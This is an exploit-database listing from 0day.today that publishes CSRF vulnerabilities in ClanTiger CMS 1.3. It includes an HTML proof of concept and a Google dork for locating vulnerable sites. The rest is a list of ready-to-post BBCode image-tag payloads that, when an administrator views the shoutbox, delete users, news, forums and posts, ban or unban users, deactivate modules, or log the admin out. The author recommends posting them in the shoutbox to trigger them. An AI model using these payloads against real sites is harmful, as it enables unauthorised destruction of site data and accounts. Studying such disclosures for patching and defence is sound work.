[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ClanTiger Multiple CSRF Vulnerabilities

Author
pimpim
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13295
Category
web applications
Date add
11-07-2010
Platform
php
=======================================
ClanTiger Multiple CSRF Vulnerabilities
=======================================


# Exploit Title: ClanTiger 1.3 Multiple CSRF, delete user, shoutbox items, news,
??? ban/unban user, delete forum etc.
# Date: 11 July 2010
# Author: pimpim - pyscripter94@gmail.com
# Software Link: www.clantiger.com, http://www.clantiger.com/files/clantiger/1.1.3/clantiger1.1.3.zip
# Version: 1.3
# Google dork : [intext:"Powered by the Clan CMS ClanTiger"]
# Platform / Tested on: ClanTiger 1.3
# Category: webapps/0day
# Code :
<html>
??? <head><title>ClanTiger CSRF</title></head>
??? <body>
??? ??? Admin ban
??? ??? <img src="http://site.com/clantiger/clantiger/index.php?module=profiles&action=setBan&id=1"></img>
??? </body>
</html>



Some Clantiger CSRF vulnerabilites
Theese are some CSRF vulnerabilites I've found in the ClanTiger CMS.

Easiest way to exploit theese are to post them in the shoutbox, and when a user with
admin rights visits almost any page on the site, a user is deleted or a news item is removed
or what ever you want.

*Remove news Cross Site*
CSRF:
[img]http://site.com/clantiger/clantiger/index.php?module=news&action=remove&id=2[/img]

*Remove shoutbox items*
CSRF:
[img]http://site.com/clantiger/clantiger/index.php?module=shoutbox&action=remove&id=2[/img]

*Ban user Cross Site*
[img]http://site.com/clantiger/clantiger/index.php?module=profiles&action=setBan&id=44[/img]

*Activate/Unban user*
[img]http://site.com/clantiger/clantiger/index.php?module=profiles&action=setActive&id=44[/img]

*Delete user*
[img]http://site.com/clantiger/clantiger/index.php?module=profiles&action=remove&id=44[/img]

*Delete custom page*
[img]http://site.comclantiger/clantiger/index.php?module=custompages&action=remove&id=1[/img]

*Log out*
[img]http://site.com/clantiger/index.php?module=login&action=deauthenticate[/img]

*Delete Match*
[img]http://site.com/clantiger/clantiger/index.php?module=matches&action=remove&id=5[/img]

*Delete squad*
[img]http://site.com/clantiger/clantiger/index.php?module=squads&action=remove&id=1[/img]

*Delete Sponsor*
[img]http://site.com/clantiger/clantiger/index.php?module=sponsors&action=remove&id=644[/img]

*Delete forum*
[img]http://site.com/clantiger/clantiger/index.php?module=forum&action=removeForum&id=1[/img]

*Delete post*
[img]http://site.com/clantiger/index.php?module=posts&type=reply&action=delete&id=12&pid=4[/img]
id = thread id
pid = post id

*Delete widget*
[img]http://site.com/clantiger/clantiger/index.php?module=widgets&action=deactivate&id=1[/img]

*Delete smilies*
[img]http://site.com/clantiger/clantiger/index.php?module=settings&action=removeSmilie&id=1[/img]

*Deactivate module*
[img]http://site.com/clantiger/clantiger/index.php?module=modules&action=deactivate&id=18[/img]



#  0day.today [2024-12-25]  #